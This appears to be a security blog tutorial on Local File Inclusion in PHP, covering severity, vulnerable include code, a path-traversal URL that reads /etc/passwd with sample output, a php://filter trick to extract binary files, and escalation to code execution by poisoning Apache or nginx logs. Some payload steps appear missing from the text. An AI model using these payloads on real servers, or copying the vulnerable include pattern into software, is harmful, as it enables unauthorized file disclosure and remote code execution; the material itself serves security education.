Local File Inclusion (LFI)

Share on :

In this article we will go through

  • Definition
  • Severity
  • Impact
  • How it works
  • Exploitation
  • Escalations

Local file inclusion vulnerability LFI

Local file inclusion commonly known as LFI is a code flaw that allows attacker to include internal files from the system, which leads to sensitive data disclosure and may lead to RCE.

Severity

High

Impact

  1. Sensitive information disclosure
  2. Code execution
  3. Denial of Service

How it works

If the app has a "dynamic file inclusion" without proper protection, an attacker can include files which the developer didn't intend to disclose.

Vulnerable code

<?php
// Get input from user
$file = $_GET['file'];

// include the file
include('public_files/'.$file)

Attack Vector

We will pass the following value to out vulnerable parameter to get the passwd file

../../../../../etc/passwd

so let's visit the following url

https://website/?file=../../../../../etc/passwd

Output

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
messagebus:x:105:106::/var/run/dbus:/bin/false
mysql:x:106:107:MySQL Server,,,:/var/lib/mysql:/bin/false
ssh-rsa:x:1004:1004::/home/ssh-rsa:/bin/bash
...

Ok now we have successfully included an internal system file, let's exploit more.

Binary files extraction

We won't face issues extracting text files, but for non-text files (eg. PNG,JPG,RAR,ZIP) we wont be able to successfully extract the file because the server will serve stream of non printable characters, so here's the workaround for this issue using PHP filter feature

http://website/index.php?file=php://filter/convert.base64-encode/resource=image.jpg

the previous url will get the file included in base64 format

Output

Large base64 string which we can decode to get our extracted file

iVBORw0KGgoAAAANSUhEUgAAB4AAAAQ4CAYAAADo08FDAAAABHNCSVQICAgIfAhkiAAAIABJREFUeJzs3d2TJFmaF+bfOR6ZWV09H8zsLrAYK4GABSTTrUz6/y90wxWGZLoBA9MakoCZ6Zn+qMoM93N0cY5HRGZXZXV3dU91RT3PbrZnxpd7uHvEWu3P3/ctSXoAAAAAAAAA+OjVD70BAAAAAAAAAPw4BMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMAAAAAAAAAAV0IADAAAAAAAAHAlBMA
...

Escalating to Remote code execution (RCE)

In order to gain RCE on the server we have set of various techniques like :

  1. non-php file upload
  2. Apache and SSH logs code injection

1. Non-php file upload

Simply if the application allows uploading files (eg. images, videos, documents, etc) in a known directory for the attacker (eg. /images ) an attacker can inject php code within the file bytes and include the malicious file to execute the injected code

2. Apache and SSH logs code injection.

Since we are able to include most of the files on the server, let's write our malicious code in one of the files to execute it later.

Backdoor injection payload

in this step we have to inject our malicious code into log files , we can do this easily by a simple get request through netcat

please note that we have used netcat not web browsers as we need to send our code as it is , without being URL-Enocded

as a proof of concept let's run the command ls on the server

Including logs

Let's go the vulnerable page to include server logs.

for nginx logs are by default located at: /var/log/nginx/access.log

for apache logs are by default located at: /var/log/apache2/access.log

NOTE THAT:
server log location may vary depending on the server

by visiting our URL we will get the ouput of the ls command